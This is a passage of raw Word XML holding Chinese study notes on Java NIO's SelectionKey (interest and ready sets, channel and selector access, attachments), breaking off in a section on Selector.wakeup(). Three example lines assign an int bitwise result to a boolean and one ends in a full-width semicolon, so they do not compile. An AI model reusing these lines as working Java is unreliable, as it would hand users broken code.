    <w:p w:rsidR="007A31C9" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>interest集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A31C9" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ready集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A31C9" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A31C9" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Selector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="007A31C9" w:rsidRDefault="007A31C9" w:rsidP="007A31C9">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A31C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>附加的对象（可选）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="008E24C0" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E24C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="008E24C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nterest集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>就像向Selector注册通道一节中所描述的，interest集合是你所选择的感兴趣的事件集合。可以通过SelectionKey读写interest集合，像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>int interestSet = selectionKey.interestOps();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean isInterestedInAccept  = (interestSet &amp; SelectionKey.OP_ACCEPT) == SelectionKey.OP_ACCEPT；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>boolean isInterestedInConnect = interestSet &amp; SelectionKey.OP_CONNECT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>boolean isInterestedInRead    = interestSet &amp; SelectionKey.OP_READ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>boolean isInterestedInWrite   = interestSet &amp; SelectionKey.OP_WRITE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到，用“位与”操作interest 集合和给定的SelectionKey常量，可以确定某个确定的事件是否在interest 集合中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="008E24C0" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E24C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ready集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ready 集合是通道已经准备就绪的操作的集合。在一次选择(Selection)之后，你会首先访问这个ready set。Selection将在下一小节进行解释。可以这样访问ready集合：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>int readySet = selectionKey.readyOps();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>可以用像检测interest集合那样的方法，来检测channel中</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6FDD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>什么事件或操作已经就绪</w:t>
      </w:r>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是，也可以使用以下四个方法，它们都会返回一个布尔类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00760FF5" w:rsidRDefault="00760FF5" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00783C16" w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>selectionKey.isAcceptable();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00760FF5" w:rsidRDefault="00760FF5" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00783C16" w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>selectionKey.isConnectable();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00760FF5" w:rsidRDefault="00760FF5" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00783C16" w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>selectionKey.isReadable();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00760FF5" w:rsidRDefault="00760FF5" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00783C16" w:rsidRPr="00760FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>selectionKey.isWritable();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Channel + Selector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从SelectionKey访问Channel和Selector很简单。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Channel  channel  = selectionKey.channel();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selector selector = selectionKey.selector();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="008E24C0" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E24C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>附加的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将一个对象或者更多信息附着到SelectionKey上，这样就能方便的识别某个给定的通道。例如，可以附加 与通道一起使用的Buffer，或是包含聚集数据的某个对象。使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>selectionKey.attach(theObject);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Object attachedObj = selectionKey.attachment();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C16" w:rsidRPr="00783C16" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以在用register()方法向Selector注册Channel的时候附加对象。如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F735F" w:rsidRPr="00EC22BF" w:rsidRDefault="00783C16" w:rsidP="00783C16">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SelectionKey key = channel.register(selector, SelectionKey.OP_READ, theObject);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E24C0" w:rsidRPr="00F41A4C" w:rsidRDefault="006752A9" w:rsidP="006752A9">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008E24C0" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="008E24C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01642" w:rsidRPr="004A703E" w:rsidRDefault="00A01642" w:rsidP="004A703E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A703E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wakeUp()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01642" w:rsidRDefault="00A01642" w:rsidP="00A01642">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="403" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>某个线程调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法后阻塞了，即使没有通道已经就绪，也有办法让其从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法返回。只要让其它线程在第一个线程调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法的那个对象上调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Selector.wakeup()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法即可。阻塞在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
